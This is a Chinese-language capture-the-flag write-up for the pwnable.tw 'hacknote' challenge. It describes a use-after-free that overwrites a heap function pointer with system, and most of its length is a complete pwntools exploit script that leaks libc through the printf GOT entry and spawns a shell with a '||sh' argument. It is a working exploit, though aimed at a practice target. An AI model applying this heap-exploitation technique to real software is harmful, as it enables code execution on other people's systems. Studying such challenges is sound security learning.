Pwnable.tw hacknote

Pwnable.tw hacknote

简单菜单题，提供了一种利用思路

程序的独特之处在于在malloc新堆之前会先malloc(8)（我就称它为lead）过来存放puts的函数指针和解下来malloc得到的ptr

show()函数则是通过调用该位置的函数指针来进行打印

printf("Index :");
read(0, &buf, 4u);
v1 = atoi(&buf);
if ( v1 < 0 || v1 >= numbers )
{
  puts("Out of bound!");
  _exit(0);
}
if ( ptr[v1] )
  (*ptr[v1])(ptr[v1]);

显而易见，只要修改存在与堆上的函数指针为system，再show即可完成利用。
程序还存在UAF，对我们来说是个好消息。

先利用堆分配得到chunk0对应的lead，改heap_ptr为printf_got，show(0)得到libc地址，然后同样方法得到lead，改puts的函数指针为system,heap_ptr为”||sh”,’||’用来于完成参数的截断，之后show拿到shell🚩

from pwn import *
context.log_level='debug'
DEBUG=1
if DEBUG:
	r=process("./hacknote")
	libc=ELF("/lib/i386-linux-gnu/libc.so.6")

else:
	r=remote("chall.pwnable.tw",10102)
	libc=ELF("/lib/i386-linux-gnu/libc.so.6")

elf=ELF("./hacknote")

def add(sz,content):
	r.recvuntil("Your choice :")
	r.sendline('1')
	r.recvuntil("Note size :")
	r.sendline(str(sz))
	r.recvuntil("Content :")
	r.send(content)

def dele(idx):
	r.recvuntil("Your choice :")
        r.sendline('2')
	r.recvuntil("Index :")
	r.sendline(str(idx))

def show(idx):
	r.recvuntil("Your choice :")
        r.sendline('3')
	r.recvuntil("Index :")
	r.sendline(str(idx))

def pwn():
	add(0x18,'a'*8)
	add(0x18,'a'*8)
	add(0x18,'a'*8)
	dele(0)
	dele(1)
	add(0x8,p32(0x0804862B)+p32(elf.got['printf']))
	gdb.attach(r)
	show(0)
	libc_address=u32(r.recv(4))-libc.sym['printf']
	system=libc_address+libc.sym['system']
	binsh=libc_address+libc.search("/bin/sh").next()
	dele(2)
	dele(3)

	add(0x8,p32(system)+'||sh')
	show(0)
	r.interactive()
if __name__ == '__main__':
	pwn()

200分的题相对容易点，后面就难起来了🌩

赏

谢谢你请我吃糖果